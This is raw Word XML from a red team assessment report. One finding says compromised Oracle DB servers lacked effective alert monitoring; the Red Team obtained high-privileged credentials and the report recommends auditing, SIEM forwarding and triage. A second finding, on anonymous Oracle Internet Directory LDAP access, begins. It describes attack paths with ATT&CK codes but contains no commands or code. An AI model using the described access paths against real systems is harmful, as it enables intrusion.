            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3771654A" w14:textId="77777777" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="00845EFB">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ATT&amp;CK MITRE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00560205" w:rsidRPr="001019D3" w14:paraId="2F5219CE" w14:textId="77777777" w:rsidTr="00764465">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="745" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17FAAB93" w14:textId="11114A9F" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="008217FA" w:rsidP="00845EFB">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0694F24F" w14:textId="58E46C90" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00764465" w:rsidP="00845EFB">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ETS</w:t>
            </w:r>
            <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Oracle DB</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1096" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1B207441" w14:textId="77777777" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="008217FA">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA0005</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="471893E4" w14:textId="2555078C" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="00845EFB">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1778" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="14EE6719" w14:textId="77777777" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="008217FA">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1562</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18F5F8AF" w14:textId="46C3B6A5" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="00845EFB">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Impair </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Defenses</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="570966E7" w14:textId="77777777" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="00B82EDA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68588523" w14:textId="66CFB4B8" w:rsidR="008217FA" w:rsidRPr="001019D3" w:rsidRDefault="008217FA" w:rsidP="008217FA">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and performing local reconnaissance on the hosts (</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref212824973 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.3</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>), the Red Team gained access to high-privileged Oracle credentials. The c</w:t>
      </w:r>
      <w:r w:rsidR="00F53DA0" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">redentials </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00F53DA0" w:rsidRPr="001019D3">
        <w:t>llowed access to related Oracle DB server databases.</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The assessment revealed that the compromised Oracle </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>DB servers</w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> showed no evidence of effective alert monitoring or response. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DDF46B" w14:textId="77777777" w:rsidR="008217FA" w:rsidRPr="001019D3" w:rsidRDefault="008217FA" w:rsidP="008217FA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBDA1B5" w14:textId="675931F2" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="008217FA">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>While connection attempts were logged, there was no indication that these alerts were triaged or acted upon. This suggests that the alerting mechanisms were either insufficiently configured or not aligned to an “allow-only” policy, reducing their effectiveness in detecting and stopping malicious activity. In practice, this means that even if an attacker successfully gains access, their actions may go unnoticed, leaving the organization unable to trace or contain the intrusion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF164E8" w14:textId="77777777" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="008217FA">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Such gaps create opportunities for adversaries to establish persistence within the environment, manipulate or exfiltrate data, and make unauthorized changes without detection. The lack of proper event auditing and monitoring therefore significantly increases the risk of prolonged compromise, weakens forensic capabilities, and undermines the organization’s ability to respond to future attacks in a timely and effective manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B9156A" w14:textId="57F2179E" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="008217FA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Recommendation</w:t>
      </w:r>
      <w:r w:rsidR="008217FA" w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4AF8F3" w14:textId="18EF330C" w:rsidR="008217FA" w:rsidRPr="001019D3" w:rsidRDefault="008217FA" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">nsure that auditing is enabled for all critical </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Oracle </w:t>
      </w:r>
      <w:r w:rsidR="009E5C13" w:rsidRPr="001019D3">
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">B </w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t>actions, including privilege escalations, configuration changes, data exports, and access to sensitive schemas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE573CA" w14:textId="37234555" w:rsidR="008217FA" w:rsidRPr="001019D3" w:rsidRDefault="009E5C13" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">entralized and forward </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">all Oracle DB logs </w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t>to a Security Information and Event Management (SIEM) platform to allow correlation with other security events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B345838" w14:textId="1B471CE6" w:rsidR="008217FA" w:rsidRPr="001019D3" w:rsidRDefault="009E5C13" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Fine-tune Oracle DB a</w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t>lerts to operate on an “allow-only” basis, ensuring that only authorized and expected activities occur, while all anomalies trigger immediate investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165E2DD4" w14:textId="4D5CFA60" w:rsidR="008217FA" w:rsidRPr="001019D3" w:rsidRDefault="009E5C13" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">mplement clear triage procedures and escalation paths to guarantee that </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Oracle DB </w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t>alerts are acted upon promptly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B0B084" w14:textId="686B87F9" w:rsidR="008217FA" w:rsidRPr="001019D3" w:rsidRDefault="009E5C13" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Perform r</w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">egular review and validation of </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Oracle DB </w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t>audit configurations, alert rules, and response workflows are essential to maintain effectiveness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7F1C74" w14:textId="22233145" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="009E5C13" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">onduct periodic </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">ed </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">eam or </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">urple </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">eam exercises to validate that malicious </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Oracle DB </w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t>activit</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>ies</w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> generate alerts and that incident response processes can contain and remediate threats in a timely manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6438167B" w14:textId="56C34985" w:rsidR="00545A90" w:rsidRPr="001019D3" w:rsidRDefault="00545A90">
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D17D7D" w14:textId="320042E4" w:rsidR="00863178" w:rsidRPr="001019D3" w:rsidRDefault="0033159C" w:rsidP="00863178">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:pageBreakBefore/>
        <w:ind w:left="734" w:hanging="734"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="204" w:name="_Ref213092634"/>
      <w:bookmarkStart w:id="205" w:name="_Toc213253575"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Anonymous access to </w:t>
      </w:r>
      <w:r w:rsidR="006F5C7A" w:rsidRPr="001019D3">
        <w:t>Oracle Internet Directory (</w:t>
      </w:r>
      <w:r w:rsidR="000F2F00" w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>OID</w:t>
      </w:r>
      <w:r w:rsidR="006F5C7A" w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204"/>
      <w:r w:rsidR="0092561E" w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> LDAP service</w:t>
      </w:r>
      <w:r w:rsidR="00E224E7" w:rsidRPr="001019D3">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> reveals Oracle topology</w:t>
      </w:r>
      <w:bookmarkEnd w:id="205"/>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0"/>
        <w:gridCol w:w="1960"/>
        <w:gridCol w:w="1858"/>
        <w:gridCol w:w="3622"/>
      </w:tblGrid>
      <w:tr w:rsidR="00855E69" w:rsidRPr="001019D3" w14:paraId="2FE3AE1E" w14:textId="77777777" w:rsidTr="00526786">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="744" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59B39C89" w14:textId="77777777" w:rsidR="00855E69" w:rsidRPr="001019D3" w:rsidRDefault="00855E69" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1121" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A891F97" w14:textId="77777777" w:rsidR="00855E69" w:rsidRPr="001019D3" w:rsidRDefault="00855E69" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impacted assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3135" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="598DCC4E" w14:textId="77777777" w:rsidR="00855E69" w:rsidRPr="001019D3" w:rsidRDefault="00855E69" w:rsidP="004A6BBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ATT&amp;CK MITRE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB2591" w:rsidRPr="001019D3" w14:paraId="67E24BF2" w14:textId="77777777" w:rsidTr="00526786">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="744" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C9B904F" w14:textId="5F0CC6C8" w:rsidR="00FB2591" w:rsidRPr="001019D3" w:rsidRDefault="00FB2591" w:rsidP="00FB2591">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1121" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06FC179F" w14:textId="31F29352" w:rsidR="00FB2591" w:rsidRPr="001019D3" w:rsidRDefault="00FB2591" w:rsidP="00FB2591">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Oracle Internet Directory (OID)</w:t>
            </w:r>
            <w:r w:rsidR="0092561E" w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> LDAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1063" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="51BDA3DD" w14:textId="77777777" w:rsidR="006D54D9" w:rsidRPr="001019D3" w:rsidRDefault="006D54D9" w:rsidP="0092561E">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="360" w:after="100"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA-0007</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73442D79" w14:textId="77777777" w:rsidR="006D54D9" w:rsidRPr="001019D3" w:rsidRDefault="006D54D9" w:rsidP="00526786">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="120" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19917325" w14:textId="77777777" w:rsidR="006D54D9" w:rsidRPr="001019D3" w:rsidRDefault="006D54D9" w:rsidP="006D54D9">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TA-0006</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23C4418D" w14:textId="7BFB1367" w:rsidR="00FB2591" w:rsidRPr="001019D3" w:rsidRDefault="006D54D9" w:rsidP="006D54D9">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2072" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="33026EBB" w14:textId="77777777" w:rsidR="00526786" w:rsidRPr="001019D3" w:rsidRDefault="006D54D9" w:rsidP="006D54D9">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T1087.002</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EE84F47" w14:textId="754A1271" w:rsidR="006D54D9" w:rsidRPr="001019D3" w:rsidRDefault="006D54D9" w:rsidP="00526786">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="120" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Account Discovery: Domain Account</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4054D48B" w14:textId="77777777" w:rsidR="00526786" w:rsidRPr="001019D3" w:rsidRDefault="006D54D9" w:rsidP="006D54D9">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T1046</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51361043" w14:textId="39D90CF1" w:rsidR="006D54D9" w:rsidRPr="001019D3" w:rsidRDefault="006D54D9" w:rsidP="00526786">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="120" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Network Service Discovery</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A609CD5" w14:textId="77777777" w:rsidR="00526786" w:rsidRPr="001019D3" w:rsidRDefault="006D54D9" w:rsidP="006D54D9">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1552.001</w:t>
            </w:r>
          </w:p>
